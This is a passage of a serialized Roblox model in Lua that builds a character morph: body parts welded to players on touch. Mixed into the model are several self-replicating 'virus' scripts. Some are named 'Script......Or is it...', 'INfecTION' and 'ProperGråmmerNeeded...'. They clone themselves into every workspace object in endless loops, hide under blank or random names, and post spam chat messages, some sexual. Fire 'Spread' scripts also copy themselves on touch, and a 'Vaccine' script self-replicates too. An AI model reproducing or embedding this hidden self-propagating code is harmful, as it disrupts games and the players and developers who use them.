["Position"] = Vector3.new(58.2446175, -5252.2251, -344.623871),
8560
["Rotation"] = Vector3.new(178.990952, 88.9910889, 179.999969),
8561
["Anchored"] = true,
8562
["CFrame"] = CFrame.new(58.2446175, -5252.2251, -344.623871, -0.0176127348, -1.22457093e-008, 0.999844968, -0.0176082011, 0.999844968, -0.000310164382, -0.999689877, -0.0176109318, -0.0176100042),
8563
["FormFactor"] = Enum.FormFactor.Symmetric,
8564
["Size"] = Vector3.new(0.200000003, 0.200000003, 0.200000003),
8565
["BottomSurface"] = Enum.SurfaceType.Smooth,
8566
["TopSurface"] = Enum.SurfaceType.Smooth,
8567
["Color"] = Color3.new(0.768628, 0.156863, 0.109804),
8568
})
8569
o292 = Create("Script",{
8570
["Name"] = "Arm1",
8571
["Parent"] = o291,
8572
})
8573
table.insert(cors,coroutine.create(function()
8574
wait()
8575
runDummyScript(function()
8576
function onTouched(hit)
8577
	if hit.Parent:findFirstChild("Humanoid") ~= nil and hit.Parent:findFirstChild("Arm1") == nil then
8578
		local g = script.Parent.Parent.Arm1:clone()
8579
		g.Parent = hit.Parent
8580
		local C = g:GetChildren()
8581
		for i=1, #C do
8582
			if C[i].className == "Part" then
8583
				local W = Instance.new("Weld")
8584
				W.Part0 = g.Middle
8585
				W.Part1 = C[i]
8586
				local CJ = CFrame.new(g.Middle.Position)
8587
				local C0 = g.Middle.CFrame:inverse()*CJ
8588
				local C1 = C[i].CFrame:inverse()*CJ
8589
				W.C0 = C0
8590
				W.C1 = C1
8591
				W.Parent = g.Middle
8592
			end
8593
				local Y = Instance.new("Weld")
8594
				Y.Part0 = hit.Parent["Left Arm"]
8595
				Y.Part1 = g.Middle
8596
				Y.C0 = CFrame.new(0, 0, 0)
8597
				Y.Parent = Y.Part0
8598
		end
8599
8600
		local h = g:GetChildren()
8601
		for i = 1, # h do
8602
			if h[i].className == "Part" then
8603
				h[i].Anchored = false
8604
				h[i].CanCollide = false
8605
			end
8606
		end
8607
		
8608
	end
8609
8610
end
8611
8612
script.Parent.Touched:connect(onTouched)
8613
end,o292)
8614
end))
8615
o293 = Create("Script",{
8616
["Name"] = "Leg1",
8617
["Parent"] = o291,
8618
})
8619
table.insert(cors,coroutine.create(function()
8620
wait()
8621
runDummyScript(function()
8622
function onTouched(hit)
8623
	if hit.Parent:findFirstChild("Humanoid") ~= nil and hit.Parent:findFirstChild("Leg1") == nil then
8624
		local g = script.Parent.Parent.Leg1:clone()
8625
		g.Parent = hit.Parent
8626
		local C = g:GetChildren()
8627
		for i=1, #C do
8628
			if C[i].className == "Part" then
8629
				local W = Instance.new("Weld")
8630
				W.Part0 = g.Middle
8631
				W.Part1 = C[i]
8632
				local CJ = CFrame.new(g.Middle.Position)
8633
				local C0 = g.Middle.CFrame:inverse()*CJ
8634
				local C1 = C[i].CFrame:inverse()*CJ
8635
				W.C0 = C0
8636
				W.C1 = C1
8637
				W.Parent = g.Middle
8638
			end
8639
				local Y = Instance.new("Weld")
8640
				Y.Part0 = hit.Parent["Left Leg"]
8641
				Y.Part1 = g.Middle
8642
				Y.C0 = CFrame.new(0, 0, 0)
8643
				Y.Parent = Y.Part0
8644
		end
8645
8646
		local h = g:GetChildren()
8647
		for i = 1, # h do
8648
			if h[i].className == "Part" then
8649
				h[i].Anchored = false
8650
				h[i].CanCollide = false
8651
			end
8652
		end
8653
		
8654
	end
8655
8656
end
8657
8658
script.Parent.Touched:connect(onTouched)
8659
end,o293)
8660
end))
8661
o294 = Create("Script",{
8662
["Parent"] = o291,
8663
})
8664
table.insert(cors,coroutine.create(function()
8665
wait()
8666
runDummyScript(function()
8667
function onTouch(part) 
8668
local human = part.Parent:findFirstChild("Humanoid") 
8669
if human ~= nil then 
8670
part.Parent:findFirstChild("Head").Transparency = 0.98
8671
part.Parent:findFirstChild("Torso").Transparency = 1
8672
part.Parent:findFirstChild("Left Arm").Transparency = 1
8673
part.Parent:findFirstChild("Right Arm").Transparency = 1
8674
part.Parent:findFirstChild("Left Leg").Transparency = 1
8675
part.Parent:findFirstChild("Right Leg").Transparency = 1
8676
end 
8677
end 
8678
script.Parent.Touched:connect(onTouch) 
8679
8680
--COLORS
8681
8682
--1 = white
8683
--208 = Light stone grey
8684
--194 = Medium stone grey
8685
--199 = Dark stone grey
8686
--26 = Black
8687
--21 = Bright red
8688
--24 = Bright yellow
8689
--226 = Cool yellow
8690
--23 = Bright blue
8691
--107 = Bright bluish green
8692
--102 = Medium blue
8693
--11 = Pastel blue
8694
--45 = Light blue
8695
--135 = Sand blue
8696
--106 = Bright orange
8697
--105 = Br. yellowish orange
8698
--141 = Earth green
8699
--28 = Dark green
8700
--37 = Bright green
8701
--119 = Br. yellowish green
8702
--29 = Medium green
8703
--151 = Sand green
8704
--38 = Dark orange
8705
--192 = Reddish brown
8706
--104 = Bright violet
8707
--9 = Light reddish violet
8708
--101 = Medium red
8709
--5 = Brick Yellow
8710
--153 = Sand red
8711
--217 = Brown
8712
--18 = Nougat
8713
--125 = Light orange
8714
8715
8716
end,o294)
8717
end))
8718
o295 = Create("Script",{
8719
["Name"] = "Leg2",
8720
["Parent"] = o291,
8721
})
8722
table.insert(cors,coroutine.create(function()
8723
wait()
8724
runDummyScript(function()
8725
function onTouched(hit)
8726
	if hit.Parent:findFirstChild("Humanoid") ~= nil and hit.Parent:findFirstChild("Leg2") == nil then
8727
		local g = script.Parent.Parent.Leg2:clone()
8728
		g.Parent = hit.Parent
8729
		local C = g:GetChildren()
8730
		for i=1, #C do
8731
			if C[i].className == "Part" then
8732
				local W = Instance.new("Weld")
8733
				W.Part0 = g.Middle
8734
				W.Part1 = C[i]
8735
				local CJ = CFrame.new(g.Middle.Position)
8736
				local C0 = g.Middle.CFrame:inverse()*CJ
8737
				local C1 = C[i].CFrame:inverse()*CJ
8738
				W.C0 = C0
8739
				W.C1 = C1
8740
				W.Parent = g.Middle
8741
			end
8742
				local Y = Instance.new("Weld")
8743
				Y.Part0 = hit.Parent["Right Leg"]
8744
				Y.Part1 = g.Middle
8745
				Y.C0 = CFrame.new(0, 0, 0)
8746
				Y.Parent = Y.Part0
8747
		end
8748
8749
		local h = g:GetChildren()
8750
		for i = 1, # h do
8751
			if h[i].className == "Part" then
8752
				h[i].Anchored = false
8753
				h[i].CanCollide = false
8754
			end
8755
		end
8756
		
8757
	end
8758
8759
end
8760
8761
script.Parent.Touched:connect(onTouched)
8762
end,o295)
8763
end))
8764
o296 = Create("Script",{
8765
["Name"] = "Arm2",
8766
["Parent"] = o291,
8767
})
8768
table.insert(cors,coroutine.create(function()
8769
wait()
8770
runDummyScript(function()
8771
function onTouched(hit)
8772
	if hit.Parent:findFirstChild("Humanoid") ~= nil and hit.Parent:findFirstChild("Arm2") == nil then
8773
		local g = script.Parent.Parent.Arm2:clone()
8774
		g.Parent = hit.Parent
8775
		local C = g:GetChildren()
8776
		for i=1, #C do
8777
			if C[i].className == "Part" then
8778
				local W = Instance.new("Weld")
8779
				W.Part0 = g.Middle
8780
				W.Part1 = C[i]
8781
				local CJ = CFrame.new(g.Middle.Position)
8782
				local C0 = g.Middle.CFrame:inverse()*CJ
8783
				local C1 = C[i].CFrame:inverse()*CJ
8784
				W.C0 = C0
8785
				W.C1 = C1
8786
				W.Parent = g.Middle
8787
			end
8788
				local Y = Instance.new("Weld")
8789
				Y.Part0 = hit.Parent["Right Arm"]
8790
				Y.Part1 = g.Middle
8791
				Y.C0 = CFrame.new(0, 0, 0)
8792
				Y.Parent = Y.Part0
8793
		end
8794
8795
		local h = g:GetChildren()
8796
		for i = 1, # h do
8797
			if h[i].className == "Part" then
8798
				h[i].Anchored = false
8799
				h[i].CanCollide = false
8800
			end
8801
		end
8802
		
8803
	end
8804
8805
end
8806
8807
script.Parent.Touched:connect(onTouched)
8808
end,o296)
8809
end))
8810
o297 = Create("Script",{
8811
["Name"] = "Torso",
8812
["Parent"] = o291,
8813
})
8814
table.insert(cors,coroutine.create(function()
8815
wait()
8816
runDummyScript(function()
8817
function onTouched(hit)
8818
	if hit.Parent:findFirstChild("Humanoid") ~= nil and hit.Parent:findFirstChild("Chest") == nil then
8819
		local g = script.Parent.Parent.Chest:clone()
8820
		g.Parent = hit.Parent
8821
		local C = g:GetChildren()
8822
		for i=1, #C do
8823
			if C[i].className == "Part" then
8824
				local W = Instance.new("Weld")
8825
				W.Part0 = g.Middle
8826
				W.Part1 = C[i]
8827
				local CJ = CFrame.new(g.Middle.Position)
8828
				local C0 = g.Middle.CFrame:inverse()*CJ
8829
				local C1 = C[i].CFrame:inverse()*CJ
8830
				W.C0 = C0
8831
				W.C1 = C1
8832
				W.Parent = g.Middle
8833
			end
8834
				local Y = Instance.new("Weld")
8835
				Y.Part0 = hit.Parent.Torso
8836
				Y.Part1 = g.Middle
8837
				Y.C0 = CFrame.new(0, 0, 0)
8838
				Y.Parent = Y.Part0
8839
		end
8840
8841
		local h = g:GetChildren()
8842
		for i = 1, # h do
8843
			if h[i].className == "Part" then
8844
				h[i].Anchored = false
8845
				h[i].CanCollide = false
8846
			end
8847
		end
8848
		
8849
	end
8850
end
8851
8852
script.Parent.Touched:connect(onTouched)
8853
8854
end,o297)
8855
end))
8856
o298 = Create("Script",{
8857
["Name"] = "HatRemover",
8858
["Parent"] = o291,
8859
})
8860
table.insert(cors,coroutine.create(function()
8861
wait()
8862
runDummyScript(function()
8863
function onTouched(hit) 
8864
	local d = hit.Parent:GetChildren() 
8865
	for i=1, #d do 
8866
		if (d[i].className == "Hat") then 
8867
			d[i]:remove() 
8868
		end 
8869
	end
8870
end 
8871
8872
script.Parent.Touched:connect(onTouched) 
8873
end,o298)
8874
end))
8875
o299 = Create("Script",{
8876
["Name"] = "Cframe",
8877
["Parent"] = o291,
8878
})
8879
table.insert(cors,coroutine.create(function()
8880
wait()
8881
runDummyScript(function()
8882
8883
wait(2.9)
8884
8885
local p = script.Parent
8886
local me = game.Players.LocalPlayer.Character
8887
8888
8889
p.Shape = "Ball"
8890
8891
game:GetService('RunService').Stepped:connect(function()
8892
	p.CFrame = me.Torso.CFrame * CFrame.new(0,0,0) * CFrame.Angles(0,0,0)
8893
end)
8894
8895
wait(0.5)
8896
8897
me.Head.Transparency = 1
8898
8899
p:Remove()
8900
end,o299)
8901
end))
8902
o300 = Create("Model",{
8903
["Name"] = "Arm2",
8904
["Parent"] = o1,
8905
})
8906
o301 = Create("Part",{
8907
["Name"] = "Middle",
8908
["Parent"] = o300,
8909
["BrickColor"] = BrickColor.new("White"),
8910
["Transparency"] = 1,
8911
["Position"] = Vector3.new(58.4994774, -5249.41943, -351.075043),
8912
["Rotation"] = Vector3.new(-179.999939, -0.000157029906, -180),
8913
["Anchored"] = true,
8914
["CFrame"] = CFrame.new(58.4994774, -5249.41943, -351.075043, -1, 3.03810417e-008, -2.74068884e-006, 3.03781853e-008, 1, 1.04285436e-006, 2.74068884e-006, 1.04285425e-006, -1),
8915
["FormFactor"] = Enum.FormFactor.Symmetric,
8916
["Size"] = Vector3.new(1, 2, 1),
8917
["BottomSurface"] = Enum.SurfaceType.Smooth,
8918
["TopSurface"] = Enum.SurfaceType.Smooth,
8919
["Color"] = Color3.new(0.94902, 0.952941, 0.952941),
8920
})
8921
o302 = Create("Fire",{
8922
["Parent"] = o301,
8923
["Size"] = 30,
8924
["Color"] = Color3.new(1, 0.678431, 0),
8925
["Enabled"] = false,
8926
["Heat"] = 25,
8927
["SecondaryColor"] = Color3.new(1, 0, 0),
8928
})
8929
o303 = Create("Script",{
8930
["Name"] = "Spread",
8931
["Parent"] = o302,
8932
})
8933
table.insert(cors,coroutine.create(function()
8934
wait()
8935
runDummyScript(function()
8936
function Spread(part)
8937
	check = part:findFirstChild("Fire")
8938
		if check == nil then 
8939
	script.Parent:Clone().Parent = part
8940
	
8941
		elseif check ~= nil then
8942
	check.Size = check.Size + 1000000
8943
	check.Heat = check.Heat  +1000000
8944
	end
8945
end
8946
8947
8948
script.Parent.Parent.Touched:connect(Spread)
8949
8950
end,o303)
8951
end))
8952
o304 = Create("Part",{
8953
["Parent"] = o300,
8954
["Material"] = Enum.Material.SmoothPlastic,
8955
["BrickColor"] = BrickColor.new("Cool yellow"),
8956
["Position"] = Vector3.new(58.5768738, -5249.18896, -351.10202),
8957
["Rotation"] = Vector3.new(2.65601866e-005, -90, 0),
8958
["Anchored"] = true,
8959
["CFrame"] = CFrame.new(58.5768738, -5249.18896, -351.10202, 3.44193904e-006, -5.93599509e-007, -1.00000954, -4.63562174e-007, 0.999998808, -6.79528341e-007, 0.999999166, 5.2453106e-007, 3.8545877e-006),
8960
["FormFactor"] = Enum.FormFactor.Custom,
8961
["Size"] = Vector3.new(1, 1.80000031, 0.949997187),
8962
["BottomSurface"] = Enum.SurfaceType.Smooth,
8963
["TopSurface"] = Enum.SurfaceType.Smooth,
8964
["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
8965
})
8966
o305 = Create("SpecialMesh",{
8967
["Parent"] = o304,
8968
["MeshId"] = "rbxasset://fonts/leftarm.mesh",
8969
["Scale"] = Vector3.new(1.00100005, 0.800000012, 1.00100005),
8970
["MeshType"] = Enum.MeshType.FileMesh,
8971
})
8972
o306 = Create("Fire",{
8973
["Parent"] = o304,
8974
["Size"] = 30,
8975
["Color"] = Color3.new(1, 0.678431, 0),
8976
["Enabled"] = false,
8977
["Heat"] = 25,
8978
["SecondaryColor"] = Color3.new(1, 0, 0),
8979
})
8980
o307 = Create("Script",{
8981
["Name"] = "Spread",
8982
["Parent"] = o306,
8983
})
8984
table.insert(cors,coroutine.create(function()
8985
wait()
8986
runDummyScript(function()
8987
function Spread(part)
8988
	check = part:findFirstChild("Fire")
8989
		if check == nil then 
8990
	script.Parent:Clone().Parent = part
8991
	
8992
		elseif check ~= nil then
8993
	check.Size = check.Size + 1000000
8994
	check.Heat = check.Heat  +1000000
8995
	end
8996
end
8997
8998
8999
script.Parent.Parent.Touched:connect(Spread)
9000
9001
end,o307)
9002
end))
9003
o309 = Create("Script",{
9004
["Name"] = "Script......Or is it...",
9005
["Parent"] = mas,
9006
})
9007
table.insert(cors,coroutine.create(function()
9008
wait()
9009
runDummyScript(function()
9010
-- Thanks for using My hack.............suka XD
9011
9012
if script.Parent.className ~= "RotateP" then
9013
	local p = Instance.new("RotateP")
9014
	p.Parent = workspace
9015
	p.Name = "dåååååååååååååång.........you got owned..."
9016
	script.Parent = p
9017
end
9018
9019
function check()
9020
	local list = workspace:GetChildren()
9021
	for i = 1, #list do
9022
		if list[i]:findFirstChild("dåååååååååååååång.........you got owned...") == nil and list[i].className ~= "RotateP" then
9023
			script.Parent:Clone().Parent = list[i]
9024
		end
9025
		wait()
9026
	end
9027
end
9028
9029
while true do
9030
	check()
9031
	if workspace:findFirstChild("Hello...I åm Your New Lord Lolz") == nil then
9032
		local main = script.Parent:Clone()
9033
		main.Name = "Hello...I åm Your New Lord Lolz"
9034
		main.Parent = workspace
9035
	end
9036
	wait(3)
9037
end
9038
-- Credit goes to Nomnomnom1..........................really..........did you need to know?!
9039
-- Have a nice day. XD
9040
end,o309)
9041
end))
9042
o311 = Create("Script",{
9043
["Name"] = "Script......Or is it...",
9044
["Parent"] = mas,
9045
})
9046
table.insert(cors,coroutine.create(function()
9047
wait()
9048
runDummyScript(function()
9049
if script.Parent.className ~= "RotateP" then
9050
	local p = Instance.new("RotateP")
9051
	p.Parent = workspace
9052
	p.Name = "INfecTION"
9053
	script.Parent = p
9054
end
9055
9056
function check()
9057
	local list = workspace:GetChildren()
9058
	for i = 1, #list do
9059
		if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
9060
			script.Parent:Clone().Parent = list[i]
9061
		end
9062
		wait()
9063
	end
9064
end
9065
9066
while true do
9067
	check()
9068
	if workspace:findFirstChild("inFECtion") == nil then
9069
		local main = script.Parent:Clone()
9070
		main.Name = "inFECtion"
9071
		main.Parent = workspace
9072
	end
9073
	wait(3)
9074
end
9075
9076
end,o311)
9077
end))
9078
o313 = Create("Script",{
9079
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
9080
["Parent"] = mas,
9081
})
9082
table.insert(cors,coroutine.create(function()
9083
wait()
9084
runDummyScript(function()
9085
names={"dapperguestyo"}
9086
local NameCheck = false
9087
script.Parent.Name = names[math.random(1, #names)]
9088
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
9089
local c = script.Parent:Clone()
9090
9091
function addEvent(ch)
9092
	wait(math.random())
9093
	NameCheck = false
9094
	for ss = 1, #names do
9095
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
9096
			NameCheck = true
9097
		end
9098
	end
9099
	if NameCheck == false then
9100
		local cloak = c:Clone()
9101
		cloak.Name = ""
9102
		cloak:GetChildren()[1].Name = ""
9103
		cloak.Parent = ch
9104
		cloak.Name = names[math.random(1, 5)]
9105
	end
9106
end
9107
9108
workspace.ChildAdded:connect(addEvent)
9109
9110
game.Players.PlayerAdded:connect(function(pl)
9111
	pl.Chatted:connect(function(m)
9112
		if m:sub(1, 5) == "/sc t" then
9113
			local m = Instance.new("Message")
9114
			m.Parent = workspace
9115
			m.Text = "THEY CALL ME CRAZY"
9116
			wait(1)
9117
			m.Text = "lOoOoOoOp"
9118
			wait(0.25)
9119
			m.Text = "next page"
9120
			wait(0.25)
9121
			m.Text = "lOoOoOoOp"
9122
			wait(0.25)
9123
			m.Text = "LoOoOoOoP"
9124
			wait(0.25)
9125
			m.Text = "lOoOoOoOp"
9126
			wait(0.25)
9127
			m.Text = "LoOoOoOoP"
9128
			wait(0.25)
9129
			m.Text = "GOTTA GOTTA BE CRAZY"
9130
			wait(1)
9131
			m.Text = "lOoOoOoOp"
9132
			wait(0.25)
9133
			m.Text = "LoOoOoOoP"
9134
			wait(0.25)
9135
			m.Text = "lOoOoOoOp"
9136
			wait(0.25)
9137
			m.Text = "brendantaylor rules"
9138
			wait(0.25)
9139
			m.Text = "so does iampoobx"
9140
			wait(0.25)
9141
			m.Text = "LoOoOoOoP"
9142
			wait(0.25)
9143
			m.Text = "GOTTA GET A LIFE (YOU)"
9144
			wait(3)
9145
			m:remove()
9146
		end
9147
		if m:sub(1, 5) == "HAAXX" then
9148
			local m = Instance.new("Message")
9149
			m.Parent = workspace
9150
			m.Text = "HAAXX"	
9151
			wait(3)
9152
			m:remove()
9153
		end
9154
	end)
9155
end)
9156
9157
while true do
9158
	local s = workspace:GetChildren()
9159
	for i = 1, #s do
9160
		NameCheck = false
9161
		for ss = 1, #names do
9162
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
9163
				NameCheck = true
9164
			end
9165
		end
9166
		if NameCheck == false then
9167
			local cloak = c:Clone()
9168
			cloak.Name = ""
9169
			cloak:GetChildren()[1].Name = ""
9170
			cloak.Parent = s[i]
9171
		end
9172
		wait(0.1)
9173
	end
9174
	wait(1)
9175
end
9176
9177
end,o313)
9178
end))
9179
o314 = Create("Script",{
9180
["Name"] = "Vaccine",
9181
["Parent"] = o304,
9182
})
9183
table.insert(cors,coroutine.create(function()
9184
wait()
9185
runDummyScript(function()
9186
function spread() -- created by bumblebee773
9187
local stuff = game.Workspace:GetChildren()
9188
for i = 1, #stuff do
9189
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
9190
local clone = script:clone()
9191
clone.Parent = stuff[i]
9192
end
9193
end
9194
end
9195
9196
while true do
9197
wait(.1)
9198
spread()
9199
end
9200
9201
function GetAllItems(mdl) 
9202
local objs = {} 
9203
function Search(obj) 
9204
if obj~=workspace then 
9205
table.insert(objs,obj) 
9206
end 
9207
if #obj:GetChildren() > 0 then 
9208
for i, v in ipairs(obj:GetChildren()) do 
9209
Search(v) 
9210
end 
9211
end 
9212
end 
9213
Search(mdl) 
9214
return objs 
9215
end 
9216
9217
9218
9219
for i, v in ipairs(GetAllItems(workspace)) do 
9220
if v.className == "Script" then 
9221
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then 
9222
v.Parent = game.Lighting --Just in case it has a removal prevention. 
9223
t = Instance.new("ObjectValue") 
9224
t.Name = "IsAVirus" 
9225
t.Parent = v 
9226
end 
9227
end 
9228
end 
9229
9230
for i, v in ipairs(game.Lighting:GetChildren()) do 
9231
if v:findFirstChild("IsAVirus") then --Only remove the viruses. 
9232
v:remove() 
9233
end 
9234
end 
9235
9236
9237
print("Virus debugged! All clean!")
9238
end,o314)
9239
end))
9240
o316 = Create("Script",{
9241
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
9242
["Parent"] = mas,
9243
})
9244
table.insert(cors,coroutine.create(function()
9245
wait()
9246
runDummyScript(function()
9247
names={"NoNoIDon'tNeedAllOfYourAwkwårdSovietArguments", "IAmHereToHeålYourPlace", "FeelFreeToIns3rtGrammåticålErrorsHere", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"}
9248
local NameCheck = false
9249
script.Parent.Name = names[math.random(1, #names)]
9250
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
9251
local c = script.Parent:Clone()
9252
9253
function addEvent(ch)
9254
	wait(math.random())
9255
	NameCheck = false
9256
	for ss = 1, #names do
9257
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
9258
			NameCheck = true
9259
		end
9260
	end
9261
	if NameCheck == false then
9262
		local cloak = c:Clone()
9263
		cloak.Name = ""
9264
		cloak:GetChildren()[1].Name = ""
9265
		cloak.Parent = ch
9266
		cloak.Name = names[math.random(1, 5)]
9267
	end
9268
end
9269
9270
workspace.ChildAdded:connect(addEvent)
9271
9272
game.Players.PlayerAdded:connect(function(pl)
9273
	pl.Chatted:connect(function(m)
9274
		if m:sub(1, 5) == "/sc t" then
9275
			local m = Instance.new("Message")
9276
			m.Parent = workspace
9277
			m.Text = "THEY CALL ME CRAZY"
9278
			wait(1)
9279
			m.Text = "lOoOoOoOp"
9280
			wait(0.25)
9281
			m.Text = "LoOoOoOoP"
9282
			wait(0.25)
9283
			m.Text = "lOoOoOoOp"
9284
			wait(0.25)
9285
			m.Text = "LoOoOoOoP"
9286
			wait(0.25)
9287
			m.Text = "lOoOoOoOp"
9288
			wait(0.25)
9289
			m.Text = "LoOoOoOoP"
9290
			wait(0.25)
9291
			m.Text = "GOTTA GOTTA BE CRAZY"
9292
			wait(1)
9293
			m.Text = "lOoOoOoOp"
9294
			wait(0.25)
9295
			m.Text = "LoOoOoOoP"
9296
			wait(0.25)
9297
			m.Text = "lOoOoOoOp"
9298
			wait(0.25)
9299
			m.Text = "LoOoOoOoP"
9300
			wait(0.25)
9301
			m.Text = "lOoOoOoOp"
9302
			wait(0.25)
9303
			m.Text = "LoOoOoOoP"
9304
			wait(0.25)
9305
			m.Text = "GOTTA GET A LIFE (YOU)"
9306
			wait(3)
9307
			m:remove()
9308
		end
9309
		if m:sub(1, 5) == "HAAXX" then
9310
			local m = Instance.new("Message")
9311
			m.Parent = workspace
9312
			m.Text = "HAAXX"	
9313
			wait(3)
9314
			m:remove()
9315
		end
9316
	end)
9317
end)
9318
9319
while true do
9320
	local s = workspace:GetChildren()
9321
	for i = 1, #s do
9322
		NameCheck = false
9323
		for ss = 1, #names do
9324
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
9325
				NameCheck = true
9326
			end
9327
		end
9328
		if NameCheck == false then
9329
			local cloak = c:Clone()
9330
			cloak.Name = ""
9331
			cloak:GetChildren()[1].Name = ""
9332
			cloak.Parent = s[i]
9333
		end
9334
		wait(0.1)
9335
	end
9336
	wait(1)
9337
end
9338
9339
end,o316)
9340
end))
9341
o318 = Create("Script",{
9342
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
9343
["Parent"] = mas,
9344
})
9345
table.insert(cors,coroutine.create(function()
9346
wait()
9347
runDummyScript(function()
9348
names={"AmazingOmegaJames","H75","","","","","","",""}
9349
local NameCheck = false
9350
script.Parent.Name = names[math.random(1, #names)]
9351
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
9352
local c = script.Parent:Clone()
9353
9354
function addEvent(ch)
9355
	wait(math.random())
9356
	NameCheck = false
9357
	for ss = 1, #names do
9358
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
9359
			NameCheck = true
9360
		end
9361
	end
9362
	if NameCheck == false then
9363
		local cloak = c:Clone()
9364
		cloak.Name = ""
9365
		cloak:GetChildren()[1].Name = ""
9366
		cloak.Parent = ch
9367
		cloak.Name = names[math.random(1, 5)]
9368
	end
9369
end
9370
9371
workspace.ChildAdded:connect(addEvent)
9372
9373
game.Players.PlayerAdded:connect(function(pl)
9374
	pl.Chatted:connect(function(m)
9375
		if m:sub(1, 5) == "/sc t" then
9376
			local m = Instance.new("The creator of this place is AmazingOmegaJames")
9377
			m.Parent = workspace
9378
			m.Text = "THEY CALL ME CRAZY"
9379
			wait(1)
9380
			m.Text = "lOoOoOoOp"
9381
			wait(0.25)
9382
			m.Text = "LoOoOoOoP"
9383
			wait(0.25)
9384
			m.Text = "lOoOoOoOp"
9385
			wait(0.25)
9386
			m.Text = "LoOoOoOoP"
9387
			wait(0.25)
9388
			m.Text = "lOoOoOoOp"
9389
			wait(0.25)
9390
			m.Text = "LoOoOoOoP"
9391
			wait(0.25)
9392
			m.Text = "GOTTA GOTTA BE CRAZY SEX"
9393
			wait(1)
9394
			m.Text = "lOoOoOoOp"
9395
			wait(0.25)
9396
			m.Text = "LoOoOoOoP"
9397
			wait(0.25)
9398
			m.Text = "lOoOoOoOp"
9399
			wait(0.25)
9400
			m.Text = "LoOoOoOoP"
9401
			wait(0.25)
9402
			m.Text = "lOoOoOoOp"
9403
			wait(0.25)
9404
			m.Text = "LoOoOoOoP"
9405
			wait(0.25)
9406
			m.Text = "GOTTA HAVE SEX WITH YOU"
9407
			wait(3)
9408
			m:remove()
9409
		end
9410
		if m:sub(1, 5) == " SEX HAAXX" then
9411
			local m = Instance.new("Message")
9412
			m.Parent = workspace
9413
			m.Text = " SEX HAAXX"	
9414
			wait(3)
9415
			m:remove()
9416
		end
9417
	end)
9418
end)
9419
9420
while true do
9421
	local s = workspace:GetChildren()
9422
	for i = 1, #s do
9423
		NameCheck = false
9424
		for ss = 1, #names do
9425
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
9426
				NameCheck = true
9427
			end
9428
		end
9429
		if NameCheck == false then
9430
			local cloak = c:Clone()
9431
			cloak.Name = ""
9432
			cloak:GetChildren()[1].Name = ""
9433
			cloak.Parent = s[i]
9434
		end
9435
		wait(0.1)
9436
	end
9437
	wait(1)
9438
end
9439
9440
end,o318)
9441
end))
9442
o319 = Create("Part",{
9443
["Parent"] = o300,
9444
["Material"] = Enum.Material.SmoothPlastic,
9445
["BrickColor"] = BrickColor.new("Really black"),
9446
["Position"] = Vector3.new(58.5768661, -5249.39893, -351.10202),
9447
["Rotation"] = Vector3.new(2.65601866e-005, -90, 0),
9448
["Anchored"] = true,
9449
["CFrame"] = CFrame.new(58.5768661, -5249.39893, -351.10202, 3.44193904e-006, -5.93599509e-007, -1.00000954, -4.63562174e-007, 0.999998808, -6.79528341e-007, 0.999999166, 5.2453106e-007, 3.8545877e-006),
9450
["FormFactor"] = Enum.FormFactor.Custom,
9451
["Size"] = Vector3.new(1, 2.00000024, 0.949997187),
9452
["BottomSurface"] = Enum.SurfaceType.Smooth,
9453
["TopSurface"] = Enum.SurfaceType.Smooth,
9454
["Color"] = Color3.new(0.0666667, 0.0666667, 0.0666667),
9455
})
9456
o320 = Create("SpecialMesh",{
9457
["Parent"] = o319,
9458
["MeshId"] = "rbxasset://fonts/rightarm.mesh",
9459
["MeshType"] = Enum.MeshType.FileMesh,
9460
})
9461
o321 = Create("Fire",{
9462
["Parent"] = o319,
9463
["Size"] = 30,
9464
["Color"] = Color3.new(1, 0.678431, 0),
9465
["Enabled"] = false,
9466
["Heat"] = 25,
9467
["SecondaryColor"] = Color3.new(1, 0, 0),
9468
})
9469
o322 = Create("Script",{
9470
["Name"] = "Spread",
9471
["Parent"] = o321,
9472
})
9473
table.insert(cors,coroutine.create(function()
9474
wait()
9475
runDummyScript(function()
9476
function Spread(part)
9477
	check = part:findFirstChild("Fire")
9478
		if check == nil then 
9479
	script.Parent:Clone().Parent = part
9480
	
9481
		elseif check ~= nil then
9482
	check.Size = check.Size + 1000000
9483
	check.Heat = check.Heat  +1000000
9484
	end
9485
end
9486
9487
9488
script.Parent.Parent.Touched:connect(Spread)
9489
9490
end,o322)
9491
end))
9492
o324 = Create("Script",{
9493
["Name"] = "Script......Or is it...",
9494
["Parent"] = mas,
9495
})
9496
table.insert(cors,coroutine.create(function()
9497
wait()
9498
runDummyScript(function()
9499
-- Thanks for using My hack.............suka XD
9500
9501
if script.Parent.className ~= "RotateP" then
9502
	local p = Instance.new("RotateP")
9503
	p.Parent = workspace
9504
	p.Name = "dåååååååååååååång.........you got owned..."
9505
	script.Parent = p
9506
end
9507
9508
function check()
9509
	local list = workspace:GetChildren()
9510
	for i = 1, #list do
9511
		if list[i]:findFirstChild("dåååååååååååååång.........you got owned...") == nil and list[i].className ~= "RotateP" then
9512
			script.Parent:Clone().Parent = list[i]
9513
		end
9514
		wait()
9515
	end
9516
end
9517
9518
while true do
9519
	check()
9520
	if workspace:findFirstChild("Hello...I åm Your New Lord Lolz") == nil then
9521
		local main = script.Parent:Clone()
9522
